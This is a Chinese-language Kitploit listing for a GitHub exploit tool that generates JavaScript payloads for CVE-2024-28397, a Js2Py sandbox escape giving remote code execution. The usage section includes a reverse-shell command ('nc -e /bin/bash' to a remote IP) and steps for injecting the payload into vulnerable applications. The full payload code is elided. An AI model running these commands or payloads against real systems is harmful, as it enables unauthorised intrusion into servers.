Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — CVE-2024-28397 的专业漏洞利用:Js2Py 沙箱逃逸导致远程代码执行(RCE)。包含模块化载荷生成。 | Kitploit
工具/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

CVE-2024-28397 的专业漏洞利用:Js2Py 沙箱逃逸导致远程代码执行(RCE)。包含模块化载荷生成。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站
216个月前尚未审核

技术简报预览

💡 深入阅读: 点击此处阅读完整技术简报(PDF)。

CVE-2024-28397:Js2Py 沙箱逃逸 Payload 生成器

Python License CVE

一个针对 CVE-2024-28397 的专业 Payload 生成器。该工具生成恶意 JavaScript 代码,旨在逃逸 js2py 沙箱(版本 <= 0.74)并在目标系统上执行任意命令。

🚨 漏洞详情

  • CVE 编号: CVE-2024-28397
  • 受影响组件: Js2Py <= 0.74
  • 影响: 远程代码执行(RCE)/ 沙箱逃逸
  • 机制: 利用 Object.getOwnPropertyNames 从 JavaScript 环境内部访问 Python 的 subprocess.Popen 类。

🚀 用法

该脚本生成利用此漏洞所需的确切 JavaScript Payload。使用此工具无需安装 js2py。

1. 生成 Payload

使用你想在目标机器上执行的命令来运行脚本。

root@kitploit:~
# Generate payload to run 'id'
python3 exploit.py -c "id"
root@kitploit:~
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. 攻击目标

复制工具生成的输出,并将其注入易受攻击的应用程序(例如,由 js2py 解析的 Web 表单、API 端点或配置文件)。

注入示例:

如果某个网站接受用户输入并使用 js2py.eval_js(user_input) 运行它,粘贴生成的代码即可在他们的服务器上执行你的命令。

📝 示例

root@kitploit:~
$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 作者

Ali Sünbül (xeloxa)

  • 📧 邮箱: [email protected]
  • 🌐 网站: xeloxa.netlify.app
  • 🐙 GitHub: @xeloxa

⚠️ 免责声明

本软件仅供教育和安全研究目的使用。作者对任何滥用此代码的行为概不负责。确保在测试任何非自己拥有的系统之前,已获得明确许可。

下载工具